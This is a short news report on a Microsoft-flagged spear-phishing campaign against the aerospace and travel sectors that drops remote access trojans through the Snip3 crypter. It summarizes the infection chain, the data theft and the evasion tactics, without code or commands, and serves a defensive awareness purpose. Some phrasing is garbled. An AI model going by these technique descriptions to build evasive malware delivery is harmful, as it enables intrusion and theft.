Microsoft alerts the aerospace and travel sectors of a new targeted spear-phishing campaign with several remote access trojans (RATs) deployed via a modern and stealthy malware loader.
The tech giant said it was closely monitoring the dynamic campaign activities for many months. Microsoft Security intelligence tweeted a screenshot of phishing email impersonating a reputable company and demanding a freight charter quotation.
If injected, the malware “steals credentials, screenshots and webcam data, window and clipboard data, system and network data into, and often exfiltrates data often via SMTP Port 587.” The trojan continuously re-runs components up until the infection takes place into RegAsm, InstallUtil, or RevSvcs.
They reported, “The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads.”
Morphisec last week identified the loader that lowers the RATs as a “highly sophisticated” crypter-as-a-service called “Snip3,” and is used to drop Revenge RAT, AsyncRAT, Agent Tesla, and NetWire RAT payloads on compromised computers. According to Morphisec, Snip3 can also handle sandboxing and simulated worlds, making it especially capable of evading detection-centric anti-malware solutions.
To avoid detection, the malware loader has a few tactics including PowerShell code execution with the ‘remotesigned’ parameter, staging with Pastebin and top4top, identifying of Windows Sandbox and VMWare virtualization and compiling RunPE loaders on the end point in runtime.
Microsoft claims that its 365 Defender product identifies various components of the threat, but it advises companies in the targeted industries to investigate to see if they are infected. It released a list of hunting questions so that entities would look for related behaviors, emails, implants, and other signs of an assault.